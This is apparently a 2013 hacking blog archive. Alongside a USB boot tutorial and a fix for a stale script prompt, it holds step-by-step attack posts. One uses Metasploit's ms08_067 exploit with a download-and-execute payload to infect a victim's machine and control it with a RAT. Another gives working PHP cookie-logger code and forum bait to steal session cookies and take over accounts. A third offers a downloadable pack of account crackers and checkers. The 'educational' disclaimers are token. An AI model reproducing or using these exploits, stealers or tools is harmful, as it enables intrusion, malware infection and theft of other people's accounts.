Wednesday 19 June 2013

How To Make Your USB (Pen Drive) Bootable

In this Tutorial we are going to see how we can make USB bootable using simple software. Most of my personal Visitors are facing problem with windows 7,  windows 8 OS which they do not know what to do with all the downloadable ISO files. Don’t worry this is actually the answer available for you. Within the on its way several ways you'll study how you can make USB bootable. It will assist with dispose through DVDs since at this point people don’t have to have all of them.

How To Make Your USB (Pen Drive) Bootable
1.    First download this simple software for making your pen drive bootable.
  


2.    After downloading this Universal USB Installer, run it.


3.    Now choose the operating system such as Windows 7, Windows 8 etc…
 

4.    Now Browse the ISO file which you had already downloaded. If not here are few options for you.
 
5. Next choose the USB flash drive i.e. which drive name is assigned to your pen drive by the system.  

6.    After this click on create button and your pen drive start becoming bootable. At the end click on finish and you will get bootable pen drive which you can use to install a new operating system in your Laptop or computer or workplace where ever you would like. 

I hope that now you will be able to make your pen drive bootable. If you still face any issue with this, feel free to leave your valuable comments. We try our best to reply to your comment as early as possible.

Sunday 16 June 2013

How To Fix "Google-Code-Subversion-Repository" Password Request?

Today I will talk about an error generated quite often on your blog or website's screen. Whenever you visit such affected websites, a box appears your screen which asks for username and password.

This is how it will normally look like:

How To Fix "Google-code-subversion-repository" Password Request? Solution!


You may like to read:




Before we get to the solution of the problem, let me acquaint you with a little history as to why does the error occur. Often websites have scripts hosted by the guest users and other people. In the case where they remove such scripts which you were using on your website, the error box will appear asking for username and password.

The error occurs in the form of a dialogue box as shown in the figure above. It states "A username and password are being requested by https://making-different.googlecode.com. The site says: "Google Code Subversion Repository". The link above redirects to who hosted the script.

Why Is There A Need To Fix This ?


How To Fix "Google-code-subversion-repository" Password Request? Solution!


So obviously there is a dire need to fix this problem. If this problem persists for a longer span of time, you might lose a fair amount of traffic on your website. People will hesitate opening your web page with confusing fears of being hacked.

How to Fix The The Issue ?

If you are using website services other then blogger, following steps will help you solve the problem.

  • Find the source code of your website.
  • Locate the script used by that address.
  • Delete script and save.


In case if you are using blogger services, following steps shall help you get over the issue.

  • Go to the template tab in your blogger.
  • Locate the script used by that address.
  • The script code can vary according to the address link. However in most cases it might look like this    <script src="https://making- different.googlecode.com/scriptcode" />
  • Delete that script.
  • Save your template.



You should try your best to avail the opportunity of hosting scripts yourself. www.yourjavascript.com is a good site where you can script comprehensively. Keep in mind that it is always better to ask the publisher when hosting the code your self as they have the Copyrights.

Tuesday 11 June 2013

How to infect or hack a computer with only IP address

Tutorial - How to infect or hack a computer with only IP address:

Requirements:

Nmap
Metasploit

First of all you need target IP of your victim.

Then open Metasploit Console & type db_create.
[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the victim's computer.]
Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.

Now it's time to exploit the victim's machine.
Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.

Now:

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Usage: This will show all targets by exploit]

Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]

Then Type show options
[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]

Next Type set URL http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit
[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell!

Now the final question - how to change the shellcode above to get access to someone's Windows 7 or 8? 

Hack Any accout using cookies!!

Create a CookieLogger and Hack any Account!

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today we are going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

http://crocko.com/1702516956.html

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:


<?php
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net/

Step 5: Go to the victim forum and insert this code in the signature or a post:

http://crocko.com/1702516964.html

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: We don’t take responsibility for what you do with this script, served for educational purpose only...

+Rep and hit the like button because we know it really works ]:-)
Photo: Create a CookieLogger and Hack any Account!   Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.  What is a CookieLogger?  A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.  Today we are going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …  Step 1: Save the notepad file from the link below and Rename it as Fun.gif:  http://crocko.com/1702516956.html  Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:   <?php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?>  Step 3: Create a new Notepad File and Save it as logfile.txt  Step 4: Upload this file to your server  cookielogger.php -> http://www.yoursite.com/cookielogger.php logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777) fun.gif -> http://www.yoursite.com/fun.gif  If you don’t have any Website then you can use the following Website to get a Free Website which has php support :  http://0fees.net  Step 5: Go to the victim forum and insert this code in the signature or a post:  http://crocko.com/1702516964.html  <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>  Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:  phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9  Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.  Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.  Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.  Disclaimer: We don’t take responsibility for what you do with this script, served for educational purpose only...  +Rep and hit the like button because we know it really works ]:-)

Cracker tools

For today a few cracking tools you will definitely LIKE 

I. Crackers:
We have included the most easy to use and the best crackers out there, the following are all the crackers you'll ever need.

CForce 1.01b
Apex
Villain
No Proxy Cracker
Teh hotfile AIO
rsCracker3
Uploading Cracker
Rapids R Us
Hero

II. Proxy Leechers:
Proxessor & pl 6.5 should be enough for the proxy leeching part, proxessor leeches unlimited proxies in few seconds and most of them are valid

Proxy leecher 6.5
Proxessor

III. Proxy Checkers:
Best proxy checkers just for you 

XNProxyChecker
Proxie checker By Dejay
ProxyFire Master Suite Professional 1.23
Proxy Dragon 2.0
Proxy Smoker B2

IV. Account Checkers:
Interesting collection of account checkers.

Deposit_Files_Profiler_v1.2
Flirt4Free_Checker
Steam Checker.exe
Oron_Account_Checker.exe
Profile_It_v1.6
Teh_Cam4_Checker
AIO Checker By Cricket
RsChecker V3
MegaUpload Account Checker

V. Wordlist Tools:
Only the good ones!

AthenaII
Staph 1.25
OIE 4.1
Z Leecher
Epic Leech
AIO Leecher

Free download:
Click Cracking Tools All In One.zip

For educational purposes only!!